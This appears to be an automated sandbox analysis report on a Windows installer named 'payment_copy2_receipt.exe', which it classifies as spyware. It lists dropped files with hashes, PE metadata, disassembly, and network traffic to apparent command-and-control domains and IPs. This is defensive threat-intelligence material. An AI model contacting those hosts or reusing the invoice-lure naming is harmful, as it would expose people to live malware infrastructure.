                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:14
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/5@6/5
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 77.8% (good quality ratio 72%)
                                                      • Quality average: 72.8%
                                                      • Quality standard deviation: 31.2%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Temp\abggklv.q

                                                      Download File
                                                      Process:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5602
                                                      Entropy (8bit):6.24505051626392
                                                      Encrypted:false
                                                      SSDEEP:96:j7hz+pcihT7oMz55kZ1OquI8WDlzTuais2fmOPJ:rcTkMdqiquIRDlzy22fmOJ
                                                      MD5:6D8E18D69240FFEA42588DAB287B1101
                                                      SHA1:CEFD52A04F08EF59709DB3DDBF7F9409D0C795BE
                                                      SHA-256:2CE4DD4327EB70E03E7D48D57BC1C46EC922B73FB7E9501C1F7A2580F19F7121
                                                      SHA-512:0BE89301E5319E37B9C6641BBF3689FB91BB79B7CCA37034C4533FD87A4110F67D44D3130D0FDED9448251F9C6344EB1DED6A540A2F9152BD85D3E59B5F10ABA
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:Y8....................jW%.......,+.......K......zh....R.@...K...R....:..-X..%..,....<7..+.....zQq...Z....c.4.X...Y..-X..%..!.................j....."z.....R.a..^! ...K.oR7.^.W.R.W%.....,.B.R.m.%....l+..b....?.......C..E..-X..%..!!',+....L........[."2.*~....&.s..j...%^..J....R......["z`.......h.%^.....{.R../.X....Jc......[..%..!!',+.................j....."z.........+.-J......B...B. ..^.+...R./...?[...c...c.3.X ..G..S.R2c.J.X......S .c.J..2.c....D.Wc.....3....-^.[.....+.-^.%J.......R...R.../.X..%..,....<7..+.b...zQq.....Z....c.4.X...{..-X..%........[.........n\.f.\.u=\.|.\.{.\.z......J. .*.... .*...$ .*... .*... .*... .*... .*... .*... i*... d*... .*...R .*...X .*...F.R...\z.M...........zet.....7.|...z.t...........zEM..........zuM......J{...z.M......,`....zUM.....$mR...z.M.........z.M.....R..R.\..Bc.R.Qr.\..B3.R.r\..B=.R..R.\..B..R.Qr.\..B....n..r.....r...r..r..&..r.. ..KA..nc..b..rc...B.Z..r...B...R..R.c...f......c...B.Q...R.Qr.c...f...Qq.c...B.Q.

                                                      C:\Users\user\AppData\Local\Temp\assakziryna.z

                                                      Download File
                                                      Process:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):189440
                                                      Entropy (8bit):7.998637942598542
                                                      Encrypted:true
                                                      SSDEEP:3072:quO0aqJigCEAvaCz86Qx8s0XgLjOZ7OZyyZJ8/+UGlWBu3/2kq13Ok0em/D:qut+EAvpzIn0XgLjO5OZyAJ8/+UG4BQP
                                                      MD5:F4A6BF70E5353725EDBD930F6311A876
                                                      SHA1:D329889E536CEBF7E71E2BD7CB9B4F078E115E03
                                                      SHA-256:A640DF81745A2E0EA64055877F85F6B6B5E00512018DA51AF51B85AB5FB8CE0F
                                                      SHA-512:BC962A3C95BDC9E9C30F73C7D53463F07C16B62CF7044CEB5D06A6FA5CE96A44BFB38B02113DE92EB42D969499EF50248288E351130966F3FFD5389E31940DEE
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:l.......1..._B...w..PH.......#.SL.....d%w..*Y....a.t:...Q(.....K.M...?s....F....Cb..?.1.a...W:.S.........%...}..6:...L#z.q.F.........JV........x.....>.r=....z..(3...D.h.2.o^...N...{...?J...a...-1..../..(.......RM..hc.]2 .3.*.}..L.......c...y...s......N.N]d..Bw....^.t..g#..L...../.d.w..*Y.C..a.t:...Q(.F...a...dLa.n.K[b....>....Z.`..."...h...|.q.....ND,.Z...L#z+V=Pzu.{....{P..r.....?.......C........-.W.2.o^......$.....w.b.-..d.C..../..(........Oe.p.hc.]2 ....*.U..L..............s......N.N]d...w.m..^.t....#.SL.....d%w..*Y....a.t:...Q(.F...a...dLa.n.K[b....>....Z.`..."...h...|.q.....ND,.Z...L#z+V=Pzu.{....{P..r.....?.......C........-.W.2.o^...N...{....#.b.-..4.C..../..(.........e...hc.]2 ....*.U..L..............s......N.N]d...w.m..^.t....#.SL.....d%w..*Y....a.t:...Q(.F...a...dLa.n.K[b....>....Z.`..."...h...|.q.....ND,.Z...L#z+V=Pzu.{....{P..r.....?.......C........-.W.2.o^...N...{....#.b.-..4.C..../..(.........e...hc.]2 .

                                                      C:\Users\user\AppData\Local\Temp\fcvvthv.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                      Category:modified
                                                      Size (bytes):125440
                                                      Entropy (8bit):6.273030876874131
                                                      Encrypted:false
                                                      SSDEEP:3072:Ug2QMgHRT3WstYkFm/W3M0omix1RSlwTyv8/RMAlV:UEHRT3jtQ2cmGRSqT9l
                                                      MD5:353F7D8845E3DD77D50661A00EC7DF55
                                                      SHA1:F9AA7D4B6EC63AD64BA14E8FC9C4068204590EBC
                                                      SHA-256:38FAD353228A143830ED3057A14DFD9A0853494BE8CD7ED62CF2676F963A0963
                                                      SHA-512:AD8CACE8BC0A3889FFD76CCCC0EF823DC316FA4DB37F6A7A94278C3FACA26A547B5278B3DE615A23123DC6B0E2D61FDBFEA0BE5D48ED297001B080A813BB5233
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 54%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..P.........k...v..k......k...m.....o.....b.....n..k...l...........~...T.~.....~..Rich...........PE..L....v.c.................f........................@..........................@..............................................t........0..................................................................@...............0............................text...'e.......f.................. ..`.rdata...j.......l...j..............@..@.data...(+..........................@....gfids....... ......................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\n5335GITL

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                      Category:modified
                                                      Size (bytes):94208
                                                      Entropy (8bit):1.2889923589460437
                                                      Encrypted:false
                                                      SSDEEP:192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
                                                      MD5:7901DD9DF50A993306401B7360977746
                                                      SHA1:E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
                                                      SHA-256:1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
                                                      SHA-512:90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\nssAD55.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      File Type:COM executable for DOS
                                                      Category:dropped
                                                      Size (bytes):328874
                                                      Entropy (8bit):7.530300700886958
                                                      Encrypted:false
                                                      SSDEEP:6144:jFut+EAvpzIn0XgLjO5OZyAJ8/+UG4BQvsr0em//5EHRT3jtQ2cmGRSqT9l:put+lI/Li5iJtd4WvW0eIR+RbG2cmQ
                                                      MD5:18D5F36A346E0AEEDCB501EF671823D3
                                                      SHA1:56E354ECEF94D44EF1B827B731B7AFCDAF9F2E11
                                                      SHA-256:9F98ECEC18045E1B2A7C0CB27C0AF56467ED49166BD9E3E7CCD3E3C6E1FE4C61
                                                      SHA-512:1059B83FBF865596D437C1F662A597D17F0DA2081D7E6F2ED501B33C77EA8F8C4E94B95BF914CAE99B99D3A8DD466920EB3C82CE58FDA6BB35B552F5DCC533E4
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:. ......,...................e.................... ..........................................................................................................................................................................................................................................J...................j...............................................................................................................................h..........."...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):6.542091394809889
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:payment_copy2_receipt.exe
                                                      File size:548510
                                                      MD5:9b8c61ded729ca6c9d5f7fded18eef27
                                                      SHA1:37fc137e9aa09fc01820cd90c851ca3aee6be72a
                                                      SHA256:c1609447bd7a2ee528d1f2145ebc3ad9a53efee61111824d22f935e497bac31f
                                                      SHA512:d2696cf0e8b169763a1ba52211edbbc729f4f3a2aee8b6c029138d0fa180000b1f1781e777edb7328520c057c522371a698279e5ad178fda5b961d127bca27f5
                                                      SSDEEP:6144:lBnlWGbqCEADGaF1B1XBx23XB0RQ4MXC+l1O45IDkQBha03YIjo4:wCEQGKy3R0qPHO45FQBhaM
                                                      TLSH:9AC4FCF1C795E5A8F886AE3D41335CBB94BB997D6DA05DDE410CB4B2AF3278210A05C3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

                                                      File Icon

                                                      Icon Hash:214e9696969616a0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x40324f
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:ab6770b0a8635b9d92a5838920cfe770

                                                      Entrypoint Preview

                                                      Instruction
                                                      sub esp, 00000180h
                                                      push ebx
                                                      push ebp
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+1Ch], ebx
                                                      mov dword ptr [esp+14h], 00409130h
                                                      xor esi, esi
                                                      mov byte ptr [esp+18h], 00000020h
                                                      call dword ptr [004070B8h]
                                                      call dword ptr [004070B4h]
                                                      cmp ax, 00000006h
                                                      je 00007FCDF4BDD063h
                                                      push ebx
                                                      call 00007FCDF4BDFE51h
                                                      cmp eax, ebx
                                                      je 00007FCDF4BDD059h
                                                      push 00000C00h
                                                      call eax
                                                      push 004091E0h
                                                      call 00007FCDF4BDFDD2h
                                                      push 004091D8h
                                                      call 00007FCDF4BDFDC8h
                                                      push 004091CCh
                                                      call 00007FCDF4BDFDBEh
                                                      push 0000000Dh
                                                      call 00007FCDF4BDFE21h
                                                      push 0000000Bh
                                                      call 00007FCDF4BDFE1Ah
                                                      mov dword ptr [00423F84h], eax
                                                      call dword ptr [00407034h]
                                                      push ebx
                                                      call dword ptr [00407270h]
                                                      mov dword ptr [00424038h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+34h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0041F538h
                                                      call dword ptr [00407160h]
                                                      push 004091C0h
                                                      push 00423780h
                                                      call 00007FCDF4BDFA51h
                                                      call dword ptr [004070B0h]
                                                      mov ebp, 0042A000h
                                                      push eax
                                                      push ebp
                                                      call 00007FCDF4BDFA3Fh
                                                      push ebx
                                                      call dword ptr [00407144h]

                                                      Rich Headers

                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x42720.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x2d0000x427200x42800False0.17087640977443608data3.7167114574794757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x2d1900x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States
                                                      RT_DIALOG0x6f1b80x100dataEnglishUnited States
                                                      RT_DIALOG0x6f2b80x11cdataEnglishUnited States
                                                      RT_DIALOG0x6f3d80x60dataEnglishUnited States
                                                      RT_GROUP_ICON0x6f4380x14dataEnglishUnited States
                                                      RT_MANIFEST0x6f4500x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                                                      USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                      ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 29, 2022 16:43:29.603773117 CET4971280192.168.2.7103.100.208.243
                                                      Nov 29, 2022 16:43:29.993545055 CET8049712103.100.208.243192.168.2.7
                                                      Nov 29, 2022 16:43:29.993638039 CET4971280192.168.2.7103.100.208.243
                                                      Nov 29, 2022 16:43:29.993803024 CET4971280192.168.2.7103.100.208.243
                                                      Nov 29, 2022 16:43:30.383208036 CET8049712103.100.208.243192.168.2.7
                                                      Nov 29, 2022 16:43:30.383261919 CET8049712103.100.208.243192.168.2.7
                                                      Nov 29, 2022 16:43:30.383296967 CET8049712103.100.208.243192.168.2.7
                                                      Nov 29, 2022 16:43:30.383447886 CET4971280192.168.2.7103.100.208.243
                                                      Nov 29, 2022 16:43:30.383611917 CET4971280192.168.2.7103.100.208.243
                                                      Nov 29, 2022 16:43:30.772913933 CET8049712103.100.208.243192.168.2.7
                                                      Nov 29, 2022 16:43:40.625875950 CET4971380192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:40.645251036 CET804971375.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:40.645396948 CET4971380192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:40.645670891 CET4971380192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:40.664767981 CET804971375.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:40.692596912 CET804971375.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:40.692632914 CET804971375.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:40.692769051 CET4971380192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:40.693511009 CET4971380192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:40.706896067 CET804971375.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:40.706959963 CET4971380192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:41.658564091 CET4971380192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:42.678809881 CET4971580192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:42.697918892 CET804971575.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:42.698271990 CET4971580192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:42.698271990 CET4971580192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:42.717390060 CET804971575.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:42.837244987 CET804971575.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:42.837280989 CET804971575.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:42.837524891 CET4971580192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:42.838152885 CET4971580192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:42.852073908 CET804971575.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:42.852161884 CET4971580192.168.2.775.2.115.196
                                                      Nov 29, 2022 16:43:42.857156992 CET804971575.2.115.196192.168.2.7
                                                      Nov 29, 2022 16:43:49.040884018 CET4971680192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:49.057763100 CET804971634.110.163.134192.168.2.7
                                                      Nov 29, 2022 16:43:49.057857990 CET4971680192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:49.058307886 CET4971680192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:49.075227022 CET804971634.110.163.134192.168.2.7
                                                      Nov 29, 2022 16:43:49.175266027 CET804971634.110.163.134192.168.2.7
                                                      Nov 29, 2022 16:43:49.175347090 CET804971634.110.163.134192.168.2.7
                                                      Nov 29, 2022 16:43:49.175451994 CET4971680192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:50.065264940 CET4971680192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:51.084142923 CET4971780192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:51.103156090 CET804971734.110.163.134192.168.2.7
                                                      Nov 29, 2022 16:43:51.103333950 CET4971780192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:51.103663921 CET4971780192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:51.123337984 CET804971734.110.163.134192.168.2.7
                                                      Nov 29, 2022 16:43:51.221019030 CET804971734.110.163.134192.168.2.7
                                                      Nov 29, 2022 16:43:51.221077919 CET804971734.110.163.134192.168.2.7
                                                      Nov 29, 2022 16:43:51.221364975 CET4971780192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:51.221716881 CET4971780192.168.2.734.110.163.134
                                                      Nov 29, 2022 16:43:51.238799095 CET804971734.110.163.134192.168.2.7
                                                      Nov 29, 2022 16:43:56.275064945 CET4971880192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:56.400295973 CET804971870.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:56.402024031 CET4971880192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:56.406605005 CET4971880192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:56.531891108 CET804971870.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:56.536995888 CET804971870.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:56.537045002 CET804971870.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:56.537080050 CET804971870.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:56.537187099 CET4971880192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:56.537240982 CET4971880192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:57.409480095 CET4971880192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:58.425900936 CET4971980192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:58.551639080 CET804971970.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:58.551841974 CET4971980192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:58.553603888 CET4971980192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:58.678706884 CET804971970.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:58.679014921 CET804971970.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:58.679047108 CET804971970.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:58.679070950 CET804971970.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:43:58.679266930 CET4971980192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:58.679702044 CET4971980192.168.2.770.32.23.81
                                                      Nov 29, 2022 16:43:58.804666042 CET804971970.32.23.81192.168.2.7
                                                      Nov 29, 2022 16:44:03.759083986 CET4972080192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:03.791296959 CET80497202.57.90.16192.168.2.7
                                                      Nov 29, 2022 16:44:03.791491985 CET4972080192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:03.791666985 CET4972080192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:03.823739052 CET80497202.57.90.16192.168.2.7
                                                      Nov 29, 2022 16:44:03.823765039 CET80497202.57.90.16192.168.2.7
                                                      Nov 29, 2022 16:44:03.823781013 CET80497202.57.90.16192.168.2.7
                                                      Nov 29, 2022 16:44:03.823925972 CET4972080192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:04.800724030 CET4972080192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:05.817096949 CET4972180192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:05.849591970 CET80497212.57.90.16192.168.2.7
                                                      Nov 29, 2022 16:44:05.849843979 CET4972180192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:05.850018024 CET4972180192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:05.882168055 CET80497212.57.90.16192.168.2.7
                                                      Nov 29, 2022 16:44:05.882213116 CET80497212.57.90.16192.168.2.7
                                                      Nov 29, 2022 16:44:05.882236958 CET80497212.57.90.16192.168.2.7
                                                      Nov 29, 2022 16:44:05.882447958 CET4972180192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:05.882611036 CET4972180192.168.2.72.57.90.16
                                                      Nov 29, 2022 16:44:05.914745092 CET80497212.57.90.16192.168.2.7

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 29, 2022 16:43:29.273768902 CET6392653192.168.2.78.8.8.8
                                                      Nov 29, 2022 16:43:29.596674919 CET53639268.8.8.8192.168.2.7
                                                      Nov 29, 2022 16:43:40.413796902 CET5333653192.168.2.78.8.8.8
                                                      Nov 29, 2022 16:43:40.623732090 CET53533368.8.8.8192.168.2.7
                                                      Nov 29, 2022 16:43:48.826666117 CET5051353192.168.2.78.8.8.8
                                                      Nov 29, 2022 16:43:49.039021015 CET53505138.8.8.8192.168.2.7
                                                      Nov 29, 2022 16:43:56.242922068 CET6076553192.168.2.78.8.8.8
                                                      Nov 29, 2022 16:43:56.273133039 CET53607658.8.8.8192.168.2.7
                                                      Nov 29, 2022 16:44:03.725838900 CET5828353192.168.2.78.8.8.8
                                                      Nov 29, 2022 16:44:03.757194996 CET53582838.8.8.8192.168.2.7
                                                      Nov 29, 2022 16:44:10.895929098 CET4951653192.168.2.78.8.8.8
                                                      Nov 29, 2022 16:44:11.068994045 CET53495168.8.8.8192.168.2.7

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Nov 29, 2022 16:43:29.273768902 CET192.168.2.78.8.8.80x36ccStandard query (0)www.030332.comA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:43:40.413796902 CET192.168.2.78.8.8.80xee3cStandard query (0)www.vnsuda.lolA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:43:48.826666117 CET192.168.2.78.8.8.80x818Standard query (0)www.coolfashionshop.xyzA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:43:56.242922068 CET192.168.2.78.8.8.80xf885Standard query (0)www.stephapproved.comA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:44:03.725838900 CET192.168.2.78.8.8.80xf051Standard query (0)www.bem4u.shopA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:44:10.895929098 CET192.168.2.78.8.8.80x9572Standard query (0)www.kahrabaonline.comA (IP address)IN (0x0001)false

                                                      DNS Answers

